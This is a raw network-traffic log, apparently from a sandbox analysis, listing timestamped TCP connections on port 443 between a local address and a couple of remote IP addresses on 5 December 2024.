                                                                                                                                                                                                Dec 5, 2024 08:24:54.295954943 CET49795443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.296192884 CET44349794164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.296288013 CET44349793164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.296628952 CET49795443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.296693087 CET44349795164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.296909094 CET49793443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.296987057 CET44349793164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.297132969 CET49794443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.297207117 CET44349794164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.297306061 CET49795443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.297314882 CET44349795164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.297415972 CET49793443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.297472954 CET49794443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.339339018 CET44349793164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.343329906 CET44349794164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.423775911 CET49795443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.554734945 CET44349798164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.554991007 CET49798443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.555008888 CET44349798164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.555406094 CET44349798164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.555973053 CET49798443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.556054115 CET44349798164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.556066990 CET44349799164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.556149960 CET49798443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.556493044 CET49799443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.556509972 CET44349799164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.556873083 CET44349799164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.557164907 CET49799443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.557246923 CET44349799164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.557343960 CET49799443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.569287062 CET44349800164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.580096960 CET49800443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.580116034 CET44349800164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.581142902 CET44349800164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.581211090 CET49800443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.583868027 CET49800443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.583934069 CET44349800164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.584296942 CET49800443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:54.584307909 CET44349800164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.599332094 CET44349798164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.599334002 CET44349799164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:54.654122114 CET49800443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.030692101 CET44349793164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.042905092 CET44349793164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.042963982 CET49793443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.042989016 CET44349793164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.043534040 CET44349793164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.043692112 CET49793443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.075994968 CET49793443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.076026917 CET44349793164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.141737938 CET44349795164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.145576954 CET44349795164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.145637035 CET49795443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.174073935 CET49795443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.174102068 CET44349795164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.313540936 CET49806443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.313570976 CET44349806164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.313632011 CET49806443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.313966990 CET49806443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.313980103 CET44349806164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.368133068 CET44349799164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.370554924 CET44349799164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.370695114 CET49799443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.370699883 CET44349799164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.370752096 CET49799443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.400610924 CET44349800164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.400639057 CET44349800164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.400648117 CET44349800164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.400702000 CET49800443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.400728941 CET44349800164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.405383110 CET44349800164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.405466080 CET49800443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.559206963 CET49799443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.559251070 CET44349799164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.562108994 CET49800443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.562151909 CET44349800164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.624612093 CET49807443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.624650002 CET44349807164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.624772072 CET49807443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.625000954 CET49807443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.625015020 CET44349807164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.626518011 CET49808443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.626554012 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:55.626708031 CET49808443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.627171993 CET49808443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:55.627185106 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:56.006458998 CET44349798164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:56.010018110 CET44349798164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:56.010061026 CET49798443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:56.010077953 CET44349798164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:56.010109901 CET44349798164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:56.010153055 CET49798443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:56.137466908 CET49798443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:56.137489080 CET44349798164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:56.309042931 CET44349794164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:56.309065104 CET44349794164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:56.309115887 CET49794443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:56.309144974 CET44349794164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:56.309165001 CET44349794164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:56.309206963 CET49794443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:56.695693970 CET44349806164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:56.831043005 CET49806443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.007580042 CET44349807164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.008908987 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.183636904 CET49806443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.183669090 CET44349806164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.183773041 CET49808443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.183787107 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.183871984 CET49807443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.183887005 CET44349807164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.184197903 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.184304953 CET44349807164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.184916973 CET44349806164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.184936047 CET44349806164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.184982061 CET49806443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.211222887 CET49808443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.211296082 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.211549044 CET49807443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.211651087 CET44349807164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.213195086 CET49794443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.213232994 CET44349794164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.214575052 CET49806443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.214651108 CET44349806164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.216032982 CET49808443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.216198921 CET49807443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.217055082 CET49806443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.217070103 CET44349806164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.263329029 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.263339996 CET44349807164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.315541029 CET49806443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.548829079 CET49814443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.548854113 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.548969984 CET49814443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.549197912 CET49814443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.549210072 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.665498018 CET44349806164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.665544987 CET44349806164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.665666103 CET49806443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.686305046 CET49806443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.686340094 CET44349806164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.687325001 CET49815443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.687357903 CET44349815164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.687412977 CET49815443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.687817097 CET49815443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.687832117 CET44349815164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.894495010 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.898422003 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.898473024 CET49808443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.898483038 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.898541927 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.898699045 CET49808443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.910320997 CET49808443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.910341978 CET44349808164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.929801941 CET44349807164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.938198090 CET49816443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.938235044 CET44349816164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.938442945 CET49816443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.940155983 CET49816443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.940180063 CET44349816164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.948663950 CET44349807164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.948729038 CET49807443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.951400995 CET49807443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.951410055 CET44349807164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.973829985 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.973865986 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:57.973968983 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.975832939 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:57.975851059 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:58.308109999 CET49818443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:58.308162928 CET44349818164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:58.308228016 CET49818443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:58.308841944 CET49818443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:58.308859110 CET44349818164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:58.929637909 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:58.992105961 CET49814443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:58.992117882 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:58.992691040 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:58.995090008 CET49814443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:58.995187998 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:58.995450020 CET49814443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.039335966 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.072711945 CET44349815164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.279335022 CET44349815164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.279391050 CET49815443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.318099976 CET44349816164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.358627081 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.407906055 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.439145088 CET49816443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.615086079 CET49815443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.615106106 CET44349815164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.615267038 CET49816443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.615305901 CET44349816164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.615432978 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.615463972 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.615550041 CET44349815164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.615703106 CET44349816164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.615811110 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.616487026 CET49815443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.616550922 CET44349815164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.616940975 CET49816443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.617022991 CET44349816164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.617280960 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.617366076 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.617602110 CET49815443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.617618084 CET49815443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.617629051 CET44349815164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.617872953 CET49816443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.617938995 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.659343958 CET44349816164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.659343958 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.690723896 CET44349818164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.752072096 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.752163887 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.752252102 CET49814443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.752268076 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.752281904 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:59.752331972 CET49814443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:59.798882008 CET49818443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.070041895 CET49729443192.168.2.818.194.24.71
                                                                                                                                                                                                Dec 5, 2024 08:25:00.070051908 CET4434972918.194.24.71192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.518177986 CET44349816164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.521421909 CET44349816164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.524104118 CET49816443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.543231964 CET44349815164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.543620110 CET44349815164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.543740034 CET49815443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.600567102 CET49818443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.600591898 CET44349818164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.601032019 CET44349818164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.617444038 CET49818443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.617536068 CET44349818164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.618112087 CET49815443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.618141890 CET44349815164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.618933916 CET49818443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.659328938 CET44349818164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.692544937 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.692576885 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.692585945 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.692615032 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.692625999 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.692645073 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.692682981 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.692701101 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.692732096 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.736486912 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.736510992 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.736608982 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.736628056 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.736675024 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.752176046 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.752238989 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.752269030 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.752284050 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:00.752312899 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:00.752340078 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.438616991 CET49814443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.438640118 CET44349814164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.439212084 CET49816443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.439244986 CET44349816164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.441409111 CET44349818164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.441483021 CET44349818164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.441521883 CET49818443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.441998959 CET49818443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.442008018 CET44349818164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.442488909 CET49817443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.442507982 CET44349817164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.596873045 CET49825443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.596906900 CET44349825164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.596956968 CET49825443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.597176075 CET49825443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.597187996 CET44349825164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.598664999 CET49826443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.598700047 CET44349826164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.598751068 CET49826443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.598937988 CET49826443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.598948002 CET44349826164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.741292953 CET49827443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.741344929 CET44349827164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:01.741405964 CET49827443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.741662025 CET49827443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:01.741677046 CET44349827164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:02.981312990 CET44349825164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:02.981652021 CET49825443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:02.981689930 CET44349825164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:02.982116938 CET44349825164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:02.982613087 CET49825443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:25:02.982706070 CET44349825164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:25:02.983100891 CET44349826164.92.191.86192.168.2.8
